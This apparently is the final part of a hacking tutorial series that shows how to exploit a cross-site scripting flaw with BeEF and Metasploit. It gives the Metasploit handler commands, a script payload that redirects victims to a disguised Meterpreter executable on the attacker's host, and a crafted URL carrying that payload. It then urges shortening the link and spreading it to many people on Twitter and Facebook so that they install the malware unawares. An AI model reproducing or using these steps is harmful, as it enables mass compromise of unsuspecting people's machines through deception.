Now that we have control over a victim's browser, we need to use some attacks to maintain the connection, or even better: upload a shell.
Now that the victim's browser is hooked, we need to quickly set up a persistence method to keep the connection alive. To do this, click on the IP address under the Online folder, and go to the Commands tab.
Open Persistence and click on whatever method you like. For this tutorial, I'm going to use the Confirm Close Tab method. To do this, press the Execute button in the bottom right corner. Now if the user tries to close the tab, it will repeatedly ask the user if they want to close the browser (unless it's Chrome or Opera < 12).
Now that we have a persistent connection, we can do all sorts of things with the browser. We can play sounds, check information, and even try to exploit the machine. What we're going to do now is create a Meterpreter shell with Metasploit. We don't actually need BeEF to do this, though.
Go ahead and make a payload that you want to execute. I'll just use a basic Meterpreter payload for this example. Rename this to something innocent or related like HTML5 Updated Graphics.
Open Metasploit and type use /multi/handler and set payload windows/meterpreter/reverse_tcp (or whatever payload you used). Type exploit -j -z. Upload this to your webserver.
Now we need to create a link that will ask the victim to download our malicious file. The script for doing this is <script>document.location="http://10.0.2.13/update.exe ";</script>
The URL for this search query is http://www.insecurelabs.org/Task/Rule1?query=<script>document.location="http://10.0.2.13/update.exe ";</script>
I would recommend shortening this with Bit.ly.
Send this link out to many people on Twitter or Facebook and keep listening for connections. You should get many connections very quickly. Just remember that the payload you made should be named something related to the vulnerable website.
Now we've got a Meterpreter session!
Now you can migrate and do whatever on their system! The best part is, the payload was downloaded from the official website, so they won't think it's malware.
As you can see, the XSS vulnerability is a fun and easy vulnerability to exploit. I hope you learned much from this series, and if you want some more, I could add some "bonus" attacks to do. ;)
C|H of C3